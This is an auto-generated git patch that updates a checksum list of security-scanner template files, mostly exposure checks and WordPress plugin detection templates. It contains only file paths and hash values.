http/exposures/tokens/adafruit/adafruit-api-key.yaml http/exposures/tokens/adobe/adobe-client-id.yaml http/exposures/tokens/airtable/airtable-api-key.yaml From 95fce63d9a365b6bccfe800414f8b357479c1386 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 7 Jul 2023 05:03:29 +0000 Subject: [PATCH 444/609] Auto Generated Templates Checksum [Fri Jul 7 05:03:29 UTC 2023] :robot: --- templates-checksum.txt | 413 +++++++++++++++++++++-------------------- 1 file changed, 207 insertions(+), 206 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d619f0f401..150bc4dd49 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7,7 +7,7 @@ README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 TEMPLATES-STATS.json:b322c9ba292e0298b561b25a8950e989c4b50787 TEMPLATES-STATS.md:a53dea26d4e3da65292a159ecd28b58abe0f6f3a TOP-10.md:f96c096252794274c196f158e78053e036412447 -contributors.json:db5c97304376896f78f0752cca0e621d7c97b235 +contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 cves.json:b34482e51322718857e9ee10c4c317ef24235777 cves.json-checksum.txt:53a48e1332a61ef896c0390e55bcb6a84ab1e5cf dns/azure-takeover-detection.yaml:90ea816357526ee7c170731114de8fc0a2357a27 @@ -3466,7 +3466,7 @@ http/exposures/configs/oracle-cgi-printenv.yaml:0cd3988f5489d110ec1ec907ee33011b http/exposures/configs/oracle-ebs-credentials.yaml:06f529deea20dd725a2fa6ffa1a4381b438aca71 http/exposures/configs/ovpn-config-exposed.yaml:e52d7eed4e4ff0ada6fe0ab6b72f7d726e562552 http/exposures/configs/owncloud-config.yaml:992c09865cd29069e13ef7c92c7ded00a60b3d96 -http/exposures/configs/package-json.yaml:1f65f32ad1fcba4094196a8ed317698f4032bc85 +http/exposures/configs/package-json.yaml:f7140477cdd7bc9c040264dde43e8dbd9f4f4519 http/exposures/configs/parameters-config.yaml:0c0a962092c6e76235625bc2c353e597f1aa9498 http/exposures/configs/perl-status.yaml:311f3d7a4e45fb47d1746b489df7bd7c39e076d6 http/exposures/configs/phalcon-framework-source.yaml:cd29dd1c67db32a1abbb31d0d1cf7db881cf9998 @@ -3527,7 +3527,7 @@ http/exposures/files/atom-sync-remote.yaml:4f56d5f17c86b48d47c9492ff37c0e9e53491 http/exposures/files/axis-happyaxis.yaml:7c79b675fb9882c2ccd2c39b41f9d7bd7da540cd http/exposures/files/azure-pipelines-exposed.yaml:9324ec7e5dbb0c7eb902074418f3ebe15d79fd9d http/exposures/files/bitbucket-pipelines.yaml:b15296a2d307f3992f20af82eaed3b76ccc81084 -http/exposures/files/bower-json.yaml:136b01d1ee95ac298a0b502755bbdceebc17f4b8 +http/exposures/files/bower-json.yaml:534d984892a0e9c6528ca11638be0dacc04dd8f7 http/exposures/files/build-properties.yaml:b662be2a91e9b9244f413333e3e6572f535fdc23 http/exposures/files/cargo-lock-package.yaml:c42864f006b58db6889740700d9652299a0f1d21 http/exposures/files/cargo-toml-file.yaml:dd41012cf3b8b0d0564e80b27d252cd140bc5217 @@ -3573,7 +3573,7 @@ http/exposures/files/kubernetes-etcd-keys.yaml:8eb9ed096f979d1833e6ee6eddac14895 http/exposures/files/lazy-file.yaml:39352547e7cc74ac19d1009777827af4ade871d3 http/exposures/files/npm-anonymous-cli.yaml:a7bf702a16d8afa108653910d04ce1129d5daaf1 http/exposures/files/npm-cli-metrics-json.yaml:9f7e7d31cafb817fa044e0c74334749eca723100 -http/exposures/files/npm-shrinkwrap-exposure.yaml:e026da902df06c96dea94bf97fac40ceaa61eaec +http/exposures/files/npm-shrinkwrap-exposure.yaml:33e2d8bf881d88c5526a69ec83e929a850a4e951 http/exposures/files/npmrc-authtoken.yaml:2d963af5dd93d0d34024737cac506489b723f788 http/exposures/files/nuget-package-config.yaml:af7c4aa02e49ca85866be3de49be3c7b3c6bd6a0 http/exposures/files/oauth-credentials-json.yaml:6b775c5913de636390481086b64d56f115d3d80e @@ -3586,6 +3586,7 @@ http/exposures/files/phpunit-result-cache-exposure.yaml:fc795e32060ad90c05ab6eea http/exposures/files/phpunit.yaml:96c35cdc673e98bb5654c8c904659adb5f94902e http/exposures/files/pipeline-configuration.yaml:5ac47c36504f4b6ae560f358331318ba2bde8939 http/exposures/files/pipfile-lock.yaml:783fde784775ee5bd5f67a0e4fcf9a1cc75f2495 +http/exposures/files/pnpm-lock.yaml:e21491428be6f7a319b2e447e061b9fadb3d29a8 http/exposures/files/putty-private-key-disclosure.yaml:278a016cc534adccab19e6a2be6613d135867f92 http/exposures/files/pyproject-disclosure.yaml:c62f963b2937dcc7a368ce75a9f563f8fa7b464b http/exposures/files/rails-secret-token-disclosure.yaml:af2d34def00188d0a62512c192f75b0744fa1284 @@ -3622,7 +3623,7 @@ http/exposures/files/wordpress-readme-file.yaml:6b41d48283a39137faf5bf9fc013e58d http/exposures/files/wp-cli-exposure.yaml:04a4282c2a694a0e024f78da5d78dcc81d47cfd5 http/exposures/files/ws-ftp-ini.yaml:63e0a7bce8ef6aa82466e9cc843350f46c49817b http/exposures/files/xampp-environment-variables.yaml:0c3970725b254884aa036c9af32c4da79d8415df -http/exposures/files/yarn-lock.yaml:2819096cfa528b2134d1daa628c69c052087c99b +http/exposures/files/yarn-lock.yaml:452c8de310ce300c37464f498dd99e2ca8f5a792 http/exposures/logs/access-log.yaml:e57d9ce5b1f26ef00fa31c89e2d540995c3f7e26 http/exposures/logs/badarg-log.yaml:77810a7944c58fca1f01d742135b365bab8168bb http/exposures/logs/clockwork-php-page.yaml:28267b1a0c73ade5080473c934d997b3695c92a7 @@ -5362,214 +5363,214 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 